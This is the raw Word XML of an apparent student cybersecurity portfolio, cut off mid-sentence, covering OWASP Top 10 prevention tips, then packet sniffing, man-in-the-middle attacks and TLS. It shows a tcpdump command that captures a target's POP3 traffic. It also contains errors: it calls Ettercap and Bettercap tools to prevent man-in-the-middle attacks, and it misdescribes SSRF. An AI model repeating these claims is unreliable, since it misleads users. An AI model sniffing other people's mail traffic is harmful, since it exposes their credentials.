    <w:p w14:paraId="52207A20" w14:textId="77777777" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E041A76" w14:textId="06671F1E" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use libraries of secure design patterns on your applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2175D3" w14:textId="4359071F" w:rsidR="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Limit resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49730C33" w14:textId="4068539C" w:rsidR="00A43ABC" w:rsidRPr="00A43ABC" w:rsidRDefault="00A43ABC" w:rsidP="00A43ABC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do user testing to test the design of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D2EB52" w14:textId="7506B64E" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8CBDAF" w14:textId="0B8E6779" w:rsidR="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>The security engineers must be aware of every device on their infrastructure and why is it there. The lack of infrastructure security could help the attacker to get into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1891CAF0" w14:textId="77777777" w:rsidR="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71244C58" w14:textId="2CC560C7" w:rsidR="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Always check the configurations and setting in all the infrastructure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E8DA2" w14:textId="518304BC" w:rsidR="00F40DEA" w:rsidRPr="00F40DEA" w:rsidRDefault="00F40DEA" w:rsidP="00F40DEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Keep all the systems updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295626C0" w14:textId="2A598DB2" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerable and Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DA0A2" w14:textId="74AB110C" w:rsidR="00F40DEA" w:rsidRDefault="0054016E" w:rsidP="00F40DEA">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>When you use vulnerable operating systems, web servers, databases, you are giving the attacker the green light to get into your system. The attacker only needs one vulnerable system to compromise your infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3620C110" w14:textId="77777777" w:rsidR="0054016E" w:rsidRDefault="0054016E" w:rsidP="0054016E">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9F60A" w14:textId="267E3880" w:rsidR="0054016E" w:rsidRDefault="0054016E" w:rsidP="0054016E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove unused dependencies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A5938" w14:textId="0567FA87" w:rsidR="00D33C0B" w:rsidRPr="0054016E" w:rsidRDefault="00D33C0B" w:rsidP="0054016E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Only click on trusted links from official sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E2C93" w14:textId="04C2102F" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identification and Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F37D05" w14:textId="50C86AEB" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The passwords, cookies, and session tokens are unique for the user and should not be found by intruders. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7A232" w14:textId="77777777" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA9B61" w14:textId="78C72AB2" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement multi-factor authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBDE26F" w14:textId="613AF173" w:rsidR="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement weak password checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4DB799" w14:textId="48034F4C" w:rsidR="00D33C0B" w:rsidRPr="00D33C0B" w:rsidRDefault="00D33C0B" w:rsidP="00D33C0B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Limit the requests coming from one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F364E" w14:textId="7A54ABF7" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Software and Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5614EC" w14:textId="29B2CC2D" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Relates to code and poorly secured infrastructure that might allow for the intruder to get in the system. Also, it relates to servers that rely on plugins such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7418CED5" w14:textId="77777777" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A29AC8" w14:textId="1E7A7A7D" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Make sure that your service only consumes trusted repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1F519" w14:textId="54E00507" w:rsidR="000C5B5B" w:rsidRDefault="000C5B5B" w:rsidP="000C5B5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ensure to apply security tools like OWASP to your service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DC9BE" w14:textId="44A13C97" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789E3A07" w14:textId="77777777" w:rsidR="00B2488F" w:rsidRPr="000C5B5B" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089F2422" w14:textId="46F70689" w:rsidR="000C5B5B" w:rsidRDefault="00B532A1" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Logging and Monitoring Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F969E" w14:textId="75BD2F3F" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00B2488F">
        <w:t xml:space="preserve">Detecting and logging </w:t>
      </w:r>
      <w:r>
        <w:t>all the system failures is an integral part for the security. The security people need to be aware of every error that happen inside their system before the attacker gets in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A84CB" w14:textId="77777777" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA6A3C" w14:textId="783DB431" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log every log in failure and wrong input in your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236A4B3" w14:textId="3B2FC81A" w:rsidR="00B2488F" w:rsidRPr="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encode all the log data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C367F" w14:textId="331C64E3" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-Side Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63573154" w14:textId="23D16753" w:rsidR="00B2488F" w:rsidRDefault="00B2488F" w:rsidP="00B2488F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the attacker adjusts the code to behave as they want. </w:t>
      </w:r>
      <w:r w:rsidR="00F00342">
        <w:t>This could give them sensitive data about the user. Such as, cookies, log in credentials. Then the attacker can do anything that the user can do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4323A32C" w14:textId="77777777" w:rsidR="00F00342" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375A40F" w14:textId="22601FB2" w:rsidR="00F00342" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Separate your networks as many as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CACB978" w14:textId="7D3A6202" w:rsidR="00F00342" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sanitize all the input data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8C2DE" w14:textId="4C504B2A" w:rsidR="00F00342" w:rsidRPr="00B2488F" w:rsidRDefault="00F00342" w:rsidP="00F00342">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not send raw responses to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1AA2E" w14:textId="7EC038BC" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="2F4D8F97" w14:textId="5E199A00" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="1735CE04" w14:textId="475444AE" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="06DB9FEE" w14:textId="3687D5D0" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="142266C7" w14:textId="663C44A0" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="31218EA2" w14:textId="482ABD9F" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="2AB94FEF" w14:textId="6ADA5A8F" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="55D118A8" w14:textId="5CFD69F9" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="00D76ED8" w14:textId="6E98AA51" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="71CAE3FA" w14:textId="0F98E615" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="77BF7BA2" w14:textId="07F6E50D" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="25BDC61E" w14:textId="7C662EAF" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="7719DBD8" w14:textId="3613D971" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="32899426" w14:textId="6305564F" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="5ECD131A" w14:textId="7C62B6B1" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="720793DE" w14:textId="27C09752" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="2279FF61" w14:textId="3D46F6DE" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="66797930" w14:textId="5D2B1EC5" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="5A4860D4" w14:textId="25B7891F" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00412D22"/>
    <w:p w14:paraId="0D143784" w14:textId="712350DE" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00223824">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc114777209"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Self-Study</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="436C7C2F" w14:textId="59B7D7B8" w:rsidR="00223824" w:rsidRDefault="00223824" w:rsidP="00223824">
      <w:r>
        <w:t>This section will showcase all the things that I will practice (outside Fontys course) to get better at Cyber Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB9278" w14:textId="77777777" w:rsidR="004978C6" w:rsidRDefault="004978C6" w:rsidP="00223824"/>
    <w:p w14:paraId="1EE5DF5A" w14:textId="5DA3B930" w:rsidR="00FC36F7" w:rsidRDefault="00FC36F7" w:rsidP="004978C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc114777210"/>
      <w:r>
        <w:t>Protocols and Servers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="6D045182" w14:textId="77777777" w:rsidR="004978C6" w:rsidRPr="004978C6" w:rsidRDefault="004978C6" w:rsidP="004978C6"/>
    <w:p w14:paraId="585B1410" w14:textId="27C3253B" w:rsidR="00223824" w:rsidRDefault="00BD0697" w:rsidP="00BD0697">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc114777211"/>
      <w:r>
        <w:t>Sniffing Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="6CB91BD7" w14:textId="01448975" w:rsidR="00BD0697" w:rsidRDefault="00BD0697" w:rsidP="00BD0697">
      <w:r>
        <w:t>Using a network packet capture tool to get information about the target is called sniffing. Tools</w:t>
      </w:r>
      <w:r w:rsidR="003B5C0B">
        <w:t xml:space="preserve"> such as, Tcpdump (CLI), Wireshark (GUI), Tshark (CLI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE82DC" w14:textId="77777777" w:rsidR="00A40D93" w:rsidRDefault="003B5C0B" w:rsidP="00BD0697">
      <w:r>
        <w:t>To capture the target’s information, we need to have access to the same network traffic. Then we type this comman</w:t>
      </w:r>
      <w:r w:rsidR="00A40D93">
        <w:t>d:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A0028" w14:textId="4C061A86" w:rsidR="003B5C0B" w:rsidRDefault="003B5C0B" w:rsidP="00BD0697">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A40D93" w:rsidRPr="00A40D93">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 110 -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213452A9" w14:textId="1CDC6556" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get the root permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEAE67" w14:textId="7C246FA7" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the CLI tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA0EE7" w14:textId="3485629A" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We only want the traffic for POP3 server, so we specify the port 110.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B7793" w14:textId="4E285DE5" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00A40D93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-A is to get the response in ASCII format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0BE8B" w14:textId="2D2F2C38" w:rsidR="003B5C0B" w:rsidRDefault="00A40D93" w:rsidP="00BD0697">
      <w:r>
        <w:t>Wireshark does the same thing but in a graphical interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0165D" w14:textId="7F420A1D" w:rsidR="00B83FB4" w:rsidRDefault="00B83FB4" w:rsidP="00B83FB4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15978AE1" w14:textId="6947E6ED" w:rsidR="00B83FB4" w:rsidRDefault="00B83FB4" w:rsidP="00B83FB4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc114777212"/>
      <w:r>
        <w:t>Man in the Middle Attack (MITM)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="0672F72E" w14:textId="04B7A113" w:rsidR="00B83FB4" w:rsidRDefault="000E1E97" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Man in the Middle attack when 2 parties are communicating with each other and suddenly an attacker gets between them. The annoying thing about this is that the user does not realize that the connection is being changed by a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>middle man</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Also, whenever you are visiting HTTP page, you are </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1E97">
        <w:t>susceptible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a MITM attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AB14C5" w14:textId="61A45D91" w:rsidR="000E1E97" w:rsidRDefault="000E1E97" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Scenario: A user wants to send some amount of money, so they connect to the bank server and tell it to send that amount. The attacker is getting the request before the server gets it because the attacker is in the middle of the 2 parties, then the attacker change the query, amount, or the receiver to achieve what they want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A664B4" w14:textId="491EF3EC" w:rsidR="000E1E97" w:rsidRDefault="00FC36F7" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Here are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> some tools that might help you to prevent having a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>middle man</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in with your connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43807FC6" w14:textId="3DDA7E35" w:rsidR="00FC36F7" w:rsidRDefault="00000000" w:rsidP="00FC36F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId104" w:history="1">
        <w:r w:rsidR="00FC36F7" w:rsidRPr="008F1846">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.ettercap-project.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="297450C7" w14:textId="2057FEAD" w:rsidR="00FC36F7" w:rsidRDefault="00000000" w:rsidP="00FC36F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId105" w:history="1">
        <w:r w:rsidR="00FC36F7" w:rsidRPr="008F1846">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.bettercap.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4077D833" w14:textId="77777777" w:rsidR="00FC36F7" w:rsidRPr="00B83FB4" w:rsidRDefault="00FC36F7" w:rsidP="00FC36F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5137166B" w14:textId="77777777" w:rsidR="00FC36F7" w:rsidRDefault="00FC36F7" w:rsidP="00FC36F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4963F025" w14:textId="3F38578E" w:rsidR="00FC36F7" w:rsidRDefault="00FC36F7" w:rsidP="00FC36F7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc114777213"/>
      <w:r>
        <w:t>Transport Layer Security (TLS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="238AE4B6" w14:textId="2EDA5EF6" w:rsidR="00B83FB4" w:rsidRDefault="004D7659" w:rsidP="00B83FB4">
      <w:r>
        <w:t>To stay safe from the MITM attacks and many more, you need to encrypt the data that you are sending to make it difficult for the attacker to do anything. 25 years ago, the world wide web started to see applications like online shopping and online payments. People had to come up with a secure way to do that, this is when TLS was made. TLS</w:t>
      </w:r>
      <w:r w:rsidR="00D56067">
